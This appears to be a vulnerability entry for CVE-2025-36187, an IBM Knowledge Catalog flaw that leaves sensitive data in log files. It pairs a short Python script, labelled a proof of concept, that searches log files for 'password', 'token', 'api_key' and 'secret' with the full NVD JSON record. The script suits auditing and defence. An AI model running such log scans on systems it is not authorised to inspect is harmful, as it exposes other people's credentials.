CVE-2025-36187

# This PoC demonstrates checking for sensitive data in common log locations # Note: Actual paths depend on the specific IBM Knowledge Catalog installation. import os log_paths = [ "/var/log/ibm/knowledge_catalog/server.log", "/opt/ibm/knowledge_catalog/logs/application.log" ] sensitive_keywords = ["password", "token", "api_key", "secret"] print("[*] Simulating log scan for CVE-2025-36187...") for path in log_paths: if os.path.exists(path): print(f"[+] Found log file: {path}") try: with open(path, 'r', errors='ignore') as f: content = f.read() for keyword in sensitive_keywords: if keyword in content.lower(): print(f"[!] Potential sensitive data found containing keyword: {keyword}") except Exception as e: print(f"[-] Error reading file: {e}") else: print(f"[-] Log file not found: {path}")

{"cve": {"id": "CVE-2025-36187", "sourceIdentifier": "[email protected]", "published": "2026-03-25T22:16:19.090", "lastModified": "2026-03-31T20:22:17.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Knowledge Catalog Standard Cartridge 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.1, 5.1.1, 5,1.2, 5.1.3, 5.2.0, 5.2.1 stores potentially sensitive information in log files that could be read by a local privileged user."}, {"lang": "es", "value": "IBM Knowledge Catalog Standard Cartridge 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.1, 5.1.1, 5,1.2, 5.1.3, 5.2.0, 5.2.1 almacena información potencialmente sensible en archivos de registro que podría ser leída por un usuario privilegiado local."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.0.0:*:*:*:standard:*:*:*", "matchCriteriaId": "82345B79-8BBE-4197-9C31-FF2D164EE23D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.0.1:*:*:*:standard:*:*:*", "matchCriteriaId": "EB2B20F0-A084-4A05-BAAF-B04E974B8DA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.0.2:*:*:*:standard:*:*:*", "matchCriteriaId": "2161D132-565C-452E-BBC4-DC9DC92E07FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.0.3:*:*:*:standard:*:*:*", "matchCriteriaId": "59B73621-2D7A-473B-9EEA-5C62907A4EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.1:*:*:*:standard:*:*:*", "matchCriteriaId": "A4D72C2A-C79F-4695-865F-AEBC8E698D88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.1.1:*:*:*:standard:*:*:*", "matchCriteriaId": "CA8D4B80-6AD5-4A45-9292-7CA2C6D52E76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.1.2:*:*:*:standard:*:*:*", "matchCriteriaId": "331B44D0-10DB-4E40-B8B9-AD1F656D532E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.1.3:*:*:*:standard:*:*:*", "matchCriteriaId": "F5EA3551-53AF-4A70-8976-6F564413C580"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.2.0:*:*:*:standard:*:*:*", "matchCriteriaId": "5F267C03-F792-4FDD-9012-40B1F0388D26"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:knowledge_catalog:5.2.1:*:*:*:standard:*:*:*", "matchCriteriaId": "C0457945-C0E2-42FE-B2A0-618458FB7E9E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:redhat:openshift:-:*:*:*:*:*:*:*", "matchCriteriaId": "22EB28CE-7C7F-4290-85FE-5E3EBF905CF0"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267542", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}